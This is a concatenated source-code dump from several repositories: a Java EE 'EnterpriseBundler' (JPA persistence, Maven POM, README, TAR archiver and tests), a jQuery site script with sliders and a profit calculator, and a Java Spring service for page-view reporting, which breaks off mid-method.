*/ public Job update(Job job) throws ServiceUnavailableException { long start = System.currentTimeMillis(); Job managedJob = null; if (job != null) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("...beginning update of job [ " + job.getJobID() + " ]..."); } getEntityManager().getTransaction().begin(); managedJob = getEntityManager().merge(job); getEntityManager().getTransaction().commit(); if (LOGGER.isDebugEnabled()) { LOGGER.debug("Job updated in [ " + (System.currentTimeMillis() - start) + " ] ms."); } } else { LOGGER.warn("Called with a null or empty Job object. " + "Object will not be persisted."); } return managedJob; } /** * Persist the input Job object into the back-end data store. * * @param job The Job object to persist. */ public void persist(Job job) throws ServiceUnavailableException { long start = System.currentTimeMillis(); if (job != null) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("...beginning persist of job [ " + job.getJobID() + " ]..."); } getEntityManager().getTransaction().begin(); getEntityManager().persist(job); getEntityManager().getTransaction().commit(); if (LOGGER.isDebugEnabled()) { LOGGER.debug("Job persisted in [ " + (System.currentTimeMillis() - start) + " ] ms."); } } else { LOGGER.warn("Called with a null or empty Job object. " + "Object will not be persisted."); } } /** * Implementation of the <code>close()</code> method required by the * <code>Closeable</code> interface used to close the constructed * <code>EntityManager</code> object. */ @Override public void close() { if (em != null) { em.close(); } } } <file_sep>/parent/pom.xml <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> <groupId>mil.nga.EnterpriseBundler</groupId> <artifactId>parent</artifactId> <version>1.0.0</version> <packaging>pom</packaging> <name>Enterprise Bundler</name> <url>http://maven.apache.org</url> <developers> <developer> <id>carpenlc</id> <name><NAME></name> <email><EMAIL></email> </developer> </developers> <modules> <module>BundlerCommon</module> <module>BundlerEJB</module> <module>BundlerWeb</module> <module>Bundler</module> </modules> <properties> <application.version>1.0.0</application.version> <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding> <jdk.version>1.8</jdk.version> <javaee.version>7.0</javaee.version> <primefaces.version>6.0</primefaces.version> <jackson.version>2.9.8</jackson.version> <logback.version>1.2.2</logback.version> <slf4j.version>1.7.25</slf4j.version> <httpcore.version>4.4.6</httpcore.version> <httpclient.version>4.5.3</httpclient.version> <guava.version>19.0</guava.version> <tika.version>1.20</tika.version> <s3fs.version>1.5.3</s3fs.version> <aws.sdk.version>1.11.128</aws.sdk.version> <c3p0.version>0.9.1.2</c3p0.version> <hibernate-c3p0.version>4.2.20.Final</hibernate-c3p0.version> <oracle.jdbc.version>12.1.0.2.0</oracle.jdbc.version> <commons.codec.version>1.10</commons.codec.version> <commons.compress.version>1.14</commons.compress.version> <maven.compiler.source>1.8</maven.compiler.source> <maven.compiler.target>1.8</maven.compiler.target> <maven-jar-plugin.version>2.4</maven-jar-plugin.version> <maven-ear-plugin.version>2.10</maven-ear-plugin.version> <maven-ejb-plugin.version>2.3</maven-ejb-plugin.version> <maven-dependency-plugin.version>2.4</maven-dependency-plugin.version> <maven-javadoc-plugin.version>2.10.4</maven-javadoc-plugin.version> <maven-wildfly-plugin.version>1.2.0.Alpha4</maven-wildfly-plugin.version> <junit.version>4.12</junit.version> </properties> <dependencyManagement> <dependencies> <dependency> <groupId>javax</groupId> <artifactId>javaee-api</artifactId> <version>${javaee.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>com.amazonaws</groupId> <artifactId>aws-java-sdk</artifactId> <version>${aws.sdk.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>ch.qos.logback</groupId> <artifactId>logback-core</artifactId> <version>${logback.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>ch.qos.logback</groupId> <artifactId>logback-classic</artifactId> <version>${logback.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>ch.qos.logback</groupId> <artifactId>logback-access</artifactId> <version>${logback.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>org.slf4j</groupId> <artifactId>slf4j-api</artifactId> <version>${slf4j.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>org.apache.httpcomponents</groupId> <artifactId>httpcore</artifactId> <version>${httpcore.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>org.apache.httpcomponents</groupId> <artifactId>httpclient</artifactId> <version>${httpclient.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>com.fasterxml.jackson.core</groupId> <artifactId>jackson-core</artifactId> <version>${jackson.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>com.fasterxml.jackson.core</groupId> <artifactId>jackson-annotations</artifactId> <version>${jackson.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>com.fasterxml.jackson.core</groupId> <artifactId>jackson-databind</artifactId> <version>${jackson.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>commons-codec</groupId> <artifactId>commons-codec</artifactId> <version>${commons.codec.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-compress</artifactId> <version>${commons.compress.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>com.upplication</groupId> <artifactId>s3fs</artifactId> <version>${s3fs.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>com.google.guava</groupId> <artifactId>guava</artifactId> <version>${guava.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>org.apache.tika</groupId> <artifactId>tika-core</artifactId> <version>${tika.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>${junit.version}</version> <scope>test</scope> </dependency> </dependencies> </dependencyManagement> <build> <pluginManagement> <plugins> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-install-plugin</artifactId> <version>2.5.1</version> <executions> <execution> <id>install-commons-compress-lib</id> <inherited>false</inherited> <goals> <goal>install-file</goal> </goals> <phase>validate</phase> <configuration> <groupId>org.apache.commons</groupId> <artifactId>commons-compress</artifactId> <version>${commons.compress.version}</version> <packaging>jar</packaging> <file>${basedir}/lib/commons-compress-1.14.jar</file> <generatePom>true</generatePom> </configuration> </execution> <execution> <id>install-s3fs-lib</id> <inherited>false</inherited> <goals> <goal>install-file</goal> </goals> <phase>validate</phase> <configuration> <groupId>com.upplication</groupId> <artifactId>s3fs</artifactId> <version>${s3fs.version}</version> <packaging>jar</packaging> <file>${basedir}/lib/s3fs-1.5.3.jar</file> <generatePom>true</generatePom> </configuration> </execution> </executions> </plugin> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-javadoc-plugin</artifactId> <version>${maven-javadoc-plugin.version}</version> <configuration> <show>private</show> </configuration> </plugin> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-ejb-plugin</artifactId> <version>${maven-ejb-plugin.version}</version> </plugin> <plugin> <groupId>org.wildfly.plugins</groupId> <artifactId>wildfly-maven-plugin</artifactId> <version>${maven-wildfly-plugin.version}</version> <configuration> <skip>true</skip> </configuration> </plugin> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-ear-plugin</artifactId> <version>${maven-ear-plugin.version}</version> <configuration> <fileNameMapping>no-version</fileNameMapping> <version>7</version> <defaultLibBundleDir>lib</defaultLibBundleDir> <skinnywars>true</skinnywars> <libraryDirectoryMode>NONE</libraryDirectoryMode> </configuration> </plugin> </plugins> </pluginManagement> </build> </project> <file_sep>/README.md # EnterpriseBundler Repository containing the source code associated with an application designed to read/write product data that resides on any file system that has a Java NIO2 file system implementation. It was specifically designed for use with a local file system and an AWS S3 file system. ## Pre-requisites * Java (1.8 or higher) * git (v1.7 or higher) * Maven (v3.3.8 or higher) ## Includes * Modified version of Apache Commons Compress v1.14 * Modified to change all file access to utilize the Java 7 NIO 2 stream libraries. (Fork not yet uploaded to GIT) * Modified JAR file is at ~/src/main/resources/commons-compress-1.14.jar * Modified version of Amazon-S3-Filesystem-NIO2 v1.5.3 * Modified to handle authentication via IAM roles. * Modified JAR file is at ~/src/main/resources/s3fs-1.5.3.jar * Fork of original project containing modified source is available at: https://github.com/carpenlc/Amazon-S3-FileSystem-NIO2.git ## Download the Source and Build the EAR File * Download source ``` # cd /var/local/src # git clone https://github.com/carpenlc/EnterpriseBundler.git ``` * Execute the Maven targets to build the output EAR ``` # cd /var/local/src/EnterpriseBundler/parent # mvn clean package ``` * The deployable EAR file will reside at the following location ``` # /var/local/src/EnterpriseBundler/parent/Bundler/target/bundler.ear ``` ## Customizations The Hibernate/JPA persistence.xml should be modified to identify the container-managed datasource. The persistence.xml can be found at the following location: ``` # /var/local/src/EnterpriseBundler/parent/BundlerCommon/src/main/resources/META-INF/persistence.xml ``` This application properties file containing the filesystem and AWS-related settings can be found at: ``` # /var/local/src/EnterpriseBundler/parent/Bundler/src/main/application/lib/config.jar/bundler.properties ``` <file_sep>/parent/BundlerCommon/src/test/java/mil/nga/bundler/archive/TarArchiverTest.java package mil.nga.bundler.archive; import static org.junit.Assert.assertTrue; import java.io.File; import java.io.IOException; import java.nio.file.Files; import java.nio.file.Path; import java.nio.file.Paths; import java.util.List; import mil.nga.bundler.ArchiveElementFactory; import mil.nga.bundler.archive.ArchiveFactory; import mil.nga.bundler.types.ArchiveType; import mil.nga.bundler.interfaces.BundlerI; import mil.nga.bundler.model.ArchiveElement; import mil.nga.bundler.exceptions.ArchiveException; import mil.nga.bundler.exceptions.UnknownArchiveTypeException; import org.junit.Test; public class TarArchiverTest extends ArchiveTest { public String _archiveFilename1 = "tar_archive_1"; public String _archiveFilename2 = "tar_archive_2"; /** * This method tests that the TAR archiver can archive a directory * and all files contained within, maintaining directory integrity. * * @throws IOException Exception thrown if there are problems writing * the output archive file. Exceptions will fail the test. * @throws ArchiveException Exception thrown if there are problems * validating input data. Exceptions will fail the test. */ @Test public void testBundler1() throws ArchiveException, IOException { // Build the path to the output file StringBuilder sb = new StringBuilder(); sb.append(ArchiveTest._tempDir); sb.append(File.separator); sb.append(this._archiveFilename1); this._archiveFilename1 = sb.toString(); ArchiveFactory factory = ArchiveFactory.getInstance(); try { ArchiveElementFactory archiveEF = new ArchiveElementFactory(awsProps); List<ArchiveElement> elems = archiveEF.getArchiveElements(ArchiveTest._dirToArchive, "/replace"); BundlerI bundler = factory.getBundler(ArchiveType.TAR); System.out.println(this._archiveFilename1); Path p = Paths.get(this._archiveFilename1); bundler.bundle(elems, p.toUri()); System.out.println(p.toString()); String outputFile = p.toString() + "." + ArchiveType.TAR.getText(); Path p2 = Paths.get(outputFile); assertTrue(Files.exists(p2)); double bytes = Files.size(p2); System.out.println("File size [ " + bytes + " ]."); } catch (UnknownArchiveTypeException uae) { // We *should* never get this exception uae.printStackTrace(); } } /** * Test the archive functionality that accepts a list of files as input. * * @throws IOException Exception thrown if there are problems writing * the output archive file. Exceptions will fail the test. * @throws ArchiveException Exception thrown if there are problems * validating input data. Exceptions will fail the test. */ @Test public void testBundler2() throws ArchiveException, IOException { // Build the path to the output file StringBuilder sb = new StringBuilder(); sb.append(ArchiveTest._tempDir); sb.append(File.separator); sb.append(this._archiveFilename2); this._archiveFilename2 = sb.toString(); // Set up the file list List<String> list = super.getFileList(); ArchiveFactory factory = ArchiveFactory.getInstance(); try { ArchiveElementFactory archiveEF = new ArchiveElementFactory(awsProps); List<ArchiveElement> elems = archiveEF.getArchiveElements(list); BundlerI bundler = factory.getBundler(ArchiveType.TAR); System.out.println(this._archiveFilename2); Path p = Paths.get(this._archiveFilename2); bundler.bundle(elems, p.toUri()); System.out.println(p.toString()); String outputFile = p.toString() + "." + ArchiveType.TAR.getText(); Path p2 = Paths.get(outputFile); assertTrue(Files.exists(p2)); double bytes = Files.size(p2); System.out.println("File size [ " + bytes + " ]."); } catch (UnknownArchiveTypeException uae) { // We *should* never get this exception uae.printStackTrace(); } } } <file_sep>/parent/BundlerCommon/src/main/java/mil/nga/bundler/model/ExtendedFileEntry.java package mil.nga.bundler.model; import java.io.Serializable; import mil.nga.bundler.types.ArchiveType; import mil.nga.util.URIUtils; /** * Decorator class for the <code>FileEntry</code> objects that contain * an estimation of the files size after compression by the appropriate * algorithm. * * @author <NAME> */ public class ExtendedFileEntry extends FileEntryDecorator implements Serializable { /** * Eclipse-generated serialVersionUID */ private static final long serialVersionUID = 2772049575476679678L; /** * Estimated compressed size of parent file. */ private final long estimatedCompressedSize; /** * The type of output archive is an important factor in determining the * output compressed size. */ private final ArchiveType type; /** * Constructor enforcing the Builder design pattern. * @param builder Builder class implementing type checking. */ public ExtendedFileEntry(ExtendedFileEntryBuilder builder) { super(builder.element); estimatedCompressedSize = builder.estimatedCompressedSize; type = builder.type; } /** * Getter method for the decorated <code>FileEntry</code> object. * @return The type of archive that will be generated. */ @Override public FileEntry getFileEntry() { return super.getFileEntry(); } /** * Getter method for the type of output archive. * @return The type of archive that will be generated. */ public ArchiveType getArchiveType() { return type; } /** * Getter method for the estimated compressed size of the parent file. * @return The estimated compressed size. */ public long getEstimatedCompressedSize() { return estimatedCompressedSize; } /** * Getter method for the path within the output archive in which the * target file will reside. * @return The entry path. */ public String getEntryPath() { return getFileEntry().getEntryPath(); } /** * Getter method for the full path to the target file. * @return The entry path. */ public String getFilePath() { return getFileEntry().getFilePath(); } /** * Getter method for the size of the target file. * @return The size of the target file. */ public long getSize() { return getFileEntry().getSize(); } /** * Construct an ArchiveElement object from the input * parent <code>FileEntry</code> object. * * @return A new ArchiveElement object. */ public ArchiveElement getArchiveElement() { return new ArchiveElement.ArchiveElementBuilder() .entryPath(getFileEntry().getEntryPath()) .size(getFileEntry().getSize()) .uri(URIUtils.getInstance() .getURI(getFileEntry().getFilePath())) .build(); } /** * Class implementing the Builder creation pattern for new * FileEntry objects. * * @author <NAME> */ public static class ExtendedFileEntryBuilder { private FileEntry element; private long estimatedCompressedSize = -1; private ArchiveType type; /** * Method used to actually construct the ExtendedFileEntry object. * * @return A constructed and validated ExtendedFileEntry object. */ public ExtendedFileEntry build() throws IllegalStateException { ExtendedFileEntry object = new ExtendedFileEntry(this); validateExtendedFileEntryObject(object); return object; } /** * Setter method for the <code>FileEntry</code> object to decorate. * * @param value The <code>FileEntry</code> object to decorate. * @return Reference to the parent builder object. */ public ExtendedFileEntryBuilder fileEntry(FileEntry value) { element = value; return this; } /** * Setter method for the estimated compressed size of the target file. * * @param value The estimated compressed size of the target file. * @return Reference to the parent builder object. */ public ExtendedFileEntryBuilder estimatedCompressedSize(long value) { estimatedCompressedSize = value; return this; } /** * Setter method for the output archive type. * * @param value The output archive type. * @return Reference to the parent builder object. */ public ExtendedFileEntryBuilder type(ArchiveType value) { type = value; return this; } /** * Validate that all required fields are populated. * * @param object The <code>ExtendedFileEntry</code> object to validate. * @throws IllegalStateException Thrown if any of the required fields * are not populated. */ public void validateExtendedFileEntryObject(ExtendedFileEntry object) throws IllegalStateException { if (object.getArchiveType() == null) { throw new IllegalStateException ("Invalid value for archive " + "type [ null ]."); } if (object.getEstimatedCompressedSize() < 0) { throw new IllegalStateException ("Invalid value for estimated " + "compressed file size [ " + object.getEstimatedCompressedSize() + " ]."); } } } } <file_sep>/parent/BundlerCommon/src/main/java/mil/nga/bundler/archive/TarArchiver.java package mil.nga.bundler.archive; import java.io.BufferedOutputStream; import java.io.IOException; import java.net.URI; import java.nio.file.Files; import java.nio.file.Path; import java.nio.file.Paths; import java.nio.file.StandardOpenOption; import java.util.List; import mil.nga.bundler.types.ArchiveType; import mil.nga.bundler.interfaces.BundlerI; import mil.nga.bundler.exceptions.ArchiveException; import mil.nga.bundler.model.ArchiveElement; import org.apache.commons.compress.archivers.ArchiveEntry; import org.apache.commons.compress.archivers.tar.TarArchiveEntry; import org.apache.commons.compress.archivers.tar.TarArchiveOutputStream; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * Concrete class implementing the logic to create an archive file in * TAR format. * * @author <NAME> */ public class TarArchiver extends Archiver implements BundlerI { /** * Set up the Log4j system for use throughout the class */ final static Logger LOGGER = LoggerFactory.getLogger(TarArchiver.class); /** * The archive type handled by this class */ final private ArchiveType type = ArchiveType.TAR; /** * Default constructor */ public TarArchiver( ) { } /** * Required concrete method used to construct the type-appropriate * ArchiveEntry object. * * @param file Reference to the file to be added to the output archive. * @param entryPath The path within the output file where the file will be * placed. * @return The type-appropriate archive entry. */ @Override public ArchiveEntry getArchiveEntry(URI file, String entryPath) throws IOException { return new TarArchiveEntry(file, entryPath); } /** * Getter method for the archive type. * @return The archive type that this concrete class will create. */ @Override public ArchiveType getArchiveType() { return type; } /** * Execute the "bundle" operation to TAR all of the required input files * into a single output Archive. * * @param files List of files to Archive. * @param outputFile The output file in which the input list of files * will be archived. * @throws ArchiveException Thrown if there are errors creating the output * archive file. * @throws IOException Thrown if there are problems accessing any of * the target files. */ @Override public void bundle(List<ArchiveElement> files, URI outputFile) throws ArchiveException, IOException { long startTime = System.currentTimeMillis(); setOutputFile(outputFile); if ((files != null) && (files.size() > 0)) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("Creating output archive file [ " + getOutputFile().toString() + " ]."); } // Ensure the target output file does not already exist. Files.deleteIfExists(Paths.get(getOutputFile())); // Construct the output stream to the target archive file. try (TarArchiveOutputStream taos = new TarArchiveOutputStream( new BufferedOutputStream( Files.newOutputStream( Paths.get(getOutputFile()), StandardOpenOption.CREATE, StandardOpenOption.WRITE)))) { for (ArchiveElement element : files) { taos.putArchiveEntry( getArchiveEntry( element.getURI(), element.getEntryPath())); copyOneFile(taos, element.getURI()); notify(element); } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Output archive [ " + getOutputFile() + " ] created in [ " + (System.currentTimeMillis() - startTime) + " ] ms."); } } } else { LOGGER.warn("There are no input files to process. Output " + "archive not created."); } } }
09d8a68b89a76fe442884ca40faf1a73be60ab51
[ "Markdown", "Java", "Maven POM" ]
13
Java
carpenlc/EnterpriseBundler
38951c2c4f7efd08459d2d55ce583e15655873b2
536b15a5e2961f4f8f5445ec581af7170b3bfcb9
refs/heads/master
<file_sep>let mix = require('yh-mix'); mix.options({ processCssUrls: false }); mix.setPublicPath('public') .js('resources/js/app.js', 'public/js') .sass('resources/sass/app.scss', 'public/css') .version() .browserSync({ server: { baseDir: ['public'] }, proxy: undefined, files: [ 'public/js/**/*.js', 'public/css/**/*.css', ], }); ;<file_sep># dstokes5 I like this athletic site. <file_sep>window.jQuery = window.$ = require('jquery'); require('popper.js'); require('bootstrap'); require('./slick.js'); require('./magnific-popup.min.js'); require('./jparticles.all.js'); require('./jquery.ripples-min.js'); require('./animated-headline.js'); (function ($) { "use strict"; $(document).ready(function () { /*------------------------------ smooth-scrolling -------------------------------*/ $('#primary-menu li a[href*="#"]') // Remove links that don't actually link to anything .not('[href="#"]') .not('[href="#0"]') .on('click', function(event) { // On-page links if ( location.pathname.replace(/^\//, '') == this.pathname.replace(/^\//, '') && location.hostname == this.hostname ) { // Figure out element to scroll to var target = $(this.hash); target = target.length ? target : $('[name=' + this.hash.slice(1) + ']'); // Does a scroll target exist? if (target.length) { // Only prevent default if animation is actually gonna happen event.preventDefault(); $('html, body').animate({ scrollTop: target.offset().top }, 1000, function() { // Callback after animation // Must change focus! var $target = $(target); $target.focus(); if ($target.is(":focus")) { // Checking if the target was focused return false; } else { $target.attr('tabindex','-1'); // Adding tabindex for elements not focusable $target.focus(); // Set focus again }; }); } } }); /*------------------------------ fixed-nav -------------------------------*/ $(window).on('scroll', function () { var scroll = $(window).scrollTop(); if (scroll < 100) { $("#navbar").removeClass("sticky"); } else { $("#navbar").addClass("sticky"); } }); /*------------------------------ calculate -------------------------------*/ $(document).on('change', '.calculator-profit', function (e) { calculateProfit(); }) $(document).on('keyup', '.calculator-invest', function (e) { calculateProfit(); }) $(document).on('change', '.calculator-invest', function (e) { calculateProfit(); }) $('.counter').each(function () { $(this).prop('Counter',0).animate({ Counter: $(this).text() }, { duration: 4000, easing: 'swing', step: function (now) { $(this).text(Math.ceil(now)); } }); }); function calculateProfit() { var invest = $('.calculator-invest').val(); var profit = $('.calculator-profit').val(); if (! isNaN(invest) && ! isNaN(profit)) { var calculated = invest*(profit/100); $('.calculator-result-daily').text(calculated); $('.calculator-result-weekly').text(calculated*7); $('.calculator-result-monthly').text(calculated*30); } } /*------------------------------ popup-videos -------------------------------*/ $('.popup-video').magnificPopup({ disableOn: 700, type: 'iframe', mainClass: 'mfp-fade', removalDelay: 160, preloader: false, fixedContentPos: false, }); /*------------------------------ choose-section-carousel -------------------------------*/ $('.choose-section-carousel').slick({ infinite: true, autoplay: true, focusOnSelect: true, speed: 1000, slidesToShow: 5, slidesToScroll: 5, arrows: true, prevArrow:"<button type='button' class='slick-prev pull-left'><i class=\"icofont-thin-left\" aria-hidden='true'></i></button>", nextArrow:"<button type='button' class='slick-next pull-right'><i class=\"icofont-thin-right\" aria-hidden='true'></i></button>", dots: true, dotsClass: 'choose-section-dots', customPaging: function (slider, i) { var slideNumber = (i + 1), totalSlides = slider.slideCount; return '<a class="dot" role="button" title="' + slideNumber + ' of ' + totalSlides + '"><span class="string">' + slideNumber + '/' + totalSlides + '</span></a>'; }, responsive: [ { breakpoint: 1024, settings: { slidesToShow: 3, slidesToScroll: 3, infinite: true, dots: true } }, { breakpoint: 600, settings: { slidesToShow: 2, slidesToScroll: 2 } }, { breakpoint: 480, settings: { slidesToShow: 1, slidesToScroll: 1, dots: false } } ] }); /*------------------------------ investment-section-carousel -------------------------------*/ $('.investment-section-carousel').slick({ infinite: true, autoplay: true, focusOnSelect: true, speed: 1000, slidesToShow: 4, slidesToScroll: 4, arrows: true, prevArrow:"<button type='button' class='slick-prev pull-left'><i class=\"icofont-thin-left\" aria-hidden='true'></i></button>", nextArrow:"<button type='button' class='slick-next pull-right'><i class=\"icofont-thin-right\" aria-hidden='true'></i></button>", dots: true, dotsClass: 'investment-section-dots', customPaging: function (slider, i) { var slideNumber = (i + 1), totalSlides = slider.slideCount; return '<a class="dot" role="button" title="' + slideNumber + ' of ' + totalSlides + '"><span class="string">' + slideNumber + '/' + totalSlides + '</span></a>'; }, responsive: [ { breakpoint: 1024, settings: { slidesToShow: 3, slidesToScroll: 3, infinite: true, dots: true } }, { breakpoint: 600, settings: { slidesToShow: 2, slidesToScroll: 2 } }, { breakpoint: 480, settings: { slidesToShow: 1, slidesToScroll: 1, dots:false } } ] }); /*------------------------------ calculate-area -------------------------------*/ $(document).on('change', '.calculator-area-profit', function (e) { calculateAreaProfit(); }) $(document).on('keyup', '.calculator-area-invest', function (e) { calculateAreaProfit(); }) $(document).on('change', '.calculator-area-invest', function (e) { calculateAreaProfit(); }) $('.counter').each(function () { $(this).prop('Counter',0).animate({ Counter: $(this).text() }, { duration: 4000, easing: 'swing', step: function (now) { $(this).text(Math.ceil(now)); } }); }); function calculateAreaProfit() { var invest = $('.calculator-area-invest').val(); var profit = $('.calculator-area-profit').val(); if (! isNaN(invest) && ! isNaN(profit)) { var calculated = invest*(profit/100); $('.calculator-result-area-daily').text(calculated); $('.calculator-result-area-weekly').text(calculated*7); $('.calculator-result-area-monthly').text(calculated*30); } } /*------------------------------ testimonial-carousel -------------------------------*/ $('.testimonial-carousel').slick({ infinite: true, autoplay: true, centerMode:true, focusOnSelect: true, speed: 1000, slidesToShow: 2, slidesToScroll: 1, arrows: true, prevArrow:"<button type='button' class='slick-prev pull-left'><i class=\"icofont-thin-double-left\" aria-hidden='true'></i></button>", nextArrow:"<button type='button' class='slick-next pull-right'><i class=\"icofont-thin-double-right\" aria-hidden='true'></i></button>", responsive: [ { breakpoint: 600, settings: { slidesToShow: 2, slidesToScroll: 1 } }, { breakpoint: 320, settings: { slidesToShow: 1, slidesToScroll: 1, } } ] }); /*------------------------------ home-section-slider -------------------------------*/ $('.home-slider').slick({ infinite: true, autoplay: true, focusOnSelect: true, speed: 300, slidesToShow: 1, slidesToScroll: 1, arrows: true, prevArrow:"<button type='button' class='slick-prev pull-left'><i class=\"icofont-thin-left\" aria-hidden='true'></i></button>", nextArrow:"<button type='button' class='slick-next pull-right'><i class=\"icofont-thin-right\" aria-hidden='true'></i></button>", }); /*------------------------------ preloader -------------------------------*/ $("#preloader").delay(300).animate({ "opacity" : "0" }, 500, function() { $("#preloader").css("display","none"); }); /*------------------------------ JParticles -------------------------------*/ function bind(id, run) { var effect = run(); } bind('#particles', function () { return new JParticles.particle('#particles .particles', { num: 100 }); }); /*------------------------------ ripple -------------------------------*/ $('.ripple-container').ripples({ resolution: 512, dropRadius: 20, perturbance: 0.04 }); }) })(jQuery);
d76b3a76a4c757b1be6aa916a99a2336bc46521c
[ "JavaScript", "Markdown" ]
3
JavaScript
dstokes5/dstokes5
02461d4a894949f314d6e785e20bbe5015f69c36
5358a811ff532334b2aa2f7e61642aa46dd8c2a0
refs/heads/master
<file_sep>package com.ebupt.service; import java.util.ArrayList; import com.ebupt.entity.ConfReportMetadata; import com.ebupt.entity.TReportInfo; public interface TestService { ArrayList<ConfReportMetadata> testDatabase(); } <file_sep>package com.ebupt.entity; import java.io.Serializable; import java.util.ArrayList; import java.util.List; import lombok.Data; @Data public class TReportDirectory implements Serializable{ private static final long serialVersionUID = -51188552803144046L; private String dirId; private String parentId; private String dirname; private String isFinal; private String dirLevel; private String reportId; private String position; private List<TReportInfo>tReportInfosList=new ArrayList<TReportInfo>();; private List<TReportDirectory>tReportDirectorysList; } <file_sep>package com.ebupt.entity; import java.util.List; import lombok.Data; @Data public class WebSysNavigatorBis { /** * 资源/菜单/目录id */ private String id; /** * 父id */ private String parentId; /** * 菜单名字 */ private String name; /** * 图标路径 */ private String icon; /** * 关联连接 */ private String url; /** * 提示信息 */ private String tip; /** * 0:非叶子节点 1:叶子节点 */ private String type; /** * 展示位置排序 */ private String position; /** * 储存它的子菜单 */ private List<WebSysNavigatorBis> childrenWebSysNavigatorBis; //以下非数据库字段 /** * 页面访问次数 */ private String PV; /** * 访问人数 */ private String UV; } <file_sep>package com.ebupt.service.impl; import java.io.FileOutputStream; import java.text.SimpleDateFormat; import java.util.ArrayList; import java.util.Date; import java.util.List; import java.util.stream.Collectors; import org.apache.poi.hssf.usermodel.HSSFCell; import org.apache.poi.hssf.usermodel.HSSFCellStyle; import org.apache.poi.hssf.usermodel.HSSFFont; import org.apache.poi.hssf.usermodel.HSSFPalette; import org.apache.poi.hssf.usermodel.HSSFRow; import org.apache.poi.hssf.usermodel.HSSFSheet; import org.apache.poi.hssf.usermodel.HSSFWorkbook; import org.apache.poi.hssf.util.HSSFColor; import org.apache.poi.ss.usermodel.FillPatternType; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.stereotype.Service; import com.ebupt.entity.MrasPvAndUvBO; import com.ebupt.entity.SearchConditionsBO; import com.ebupt.entity.WebSysNavigatorBis; import com.ebupt.repository.MrasRepository; import com.ebupt.service.MrasService; @Service public class MrasServiceImpl implements MrasService { @Autowired private MrasRepository mrasRepository; @Override public String downloadMrasUvPv(SearchConditionsBO searchConditionsBO) throws Exception { //格式化nav List<WebSysNavigatorBis>navsList = formatAllNavigators(); //查询所有nav的pv/uv List<MrasPvAndUvBO>mrasPvAndUvList = getAllPVUV(searchConditionsBO); //设置pv/uv navsList = setAllNavigatorsPVUV(navsList,mrasPvAndUvList); //生成excel String excelPath = exportExcel(navsList,"output/",searchConditionsBO.getBeginTime(),searchConditionsBO.getEndTime()); return excelPath; } @Override public List<WebSysNavigatorBis> selectAllNavigators() { return mrasRepository.selectAllNavigators(); } @Override public List<WebSysNavigatorBis> formatAllNavigators() { // 查询所有菜单 List<WebSysNavigatorBis> allNavigatorsList = selectAllNavigators(); //整理一级菜单(首页每个模块的标题) List<WebSysNavigatorBis> navigatorsList = allNavigatorsList.stream().filter(navigator->"-1".equals(navigator.getParentId())).collect(Collectors.toList()); //整理二级菜单(每个模块的菜单项) navigatorsList.stream().forEach(firstNavigator->{ List<WebSysNavigatorBis> secondNavigatorsList = allNavigatorsList.stream().filter(navigator->firstNavigator.getId().equals(navigator.getParentId())).collect(Collectors.toList()); //整理三级菜单 secondNavigatorsList.stream().forEach( secondNavigator->{ List<WebSysNavigatorBis> thirdNavigatorsList = new ArrayList<WebSysNavigatorBis>(); allNavigatorsList.forEach(thirdNavigator->{ if(secondNavigator.getId().equals(thirdNavigator.getParentId())) { thirdNavigatorsList.add(thirdNavigator); } }); secondNavigator.setChildrenWebSysNavigatorBis(thirdNavigatorsList); } ); firstNavigator.setChildrenWebSysNavigatorBis(secondNavigatorsList); }); return navigatorsList; } /** * 设置nav的pv/uv * @param formatedNavsList * @param mrasPvAndUvList * @return */ public List<WebSysNavigatorBis> setAllNavigatorsPVUV(List<WebSysNavigatorBis> formatedNavsList,List<MrasPvAndUvBO>mrasPvAndUvList) { formatedNavsList.stream().forEach(navigator->{ //查询菜单的pv/uv navigator = setNavigatorsPVUV(navigator,mrasPvAndUvList); }); return formatedNavsList; } /** * 递归遍历nav * @param nav * @param mrasPvAndUvList * @return */ public WebSysNavigatorBis setNavigatorsPVUV(WebSysNavigatorBis nav,List<MrasPvAndUvBO>mrasPvAndUvList) { if(nav.getChildrenWebSysNavigatorBis()==null||nav.getChildrenWebSysNavigatorBis().size()==0) { //根据关键字查询pvuv List<MrasPvAndUvBO> filteredPvUvList = getPVUVByKey(nav.getName(),mrasPvAndUvList); if(!filteredPvUvList.isEmpty()) { nav.setPV(filteredPvUvList.get(0).getPV()); nav.setUV(filteredPvUvList.get(0).getUV()); }else { nav.setPV("0"); nav.setUV("0"); } }else { nav.setPV("0"); nav.setUV("0"); nav.getChildrenWebSysNavigatorBis().stream().forEach(childNavigator->{ setNavigatorsPVUV(childNavigator,mrasPvAndUvList); }); } return nav; } @Override public List<MrasPvAndUvBO> getPVUVByKey(String key,List<MrasPvAndUvBO>MrasPvAndUvList){ return 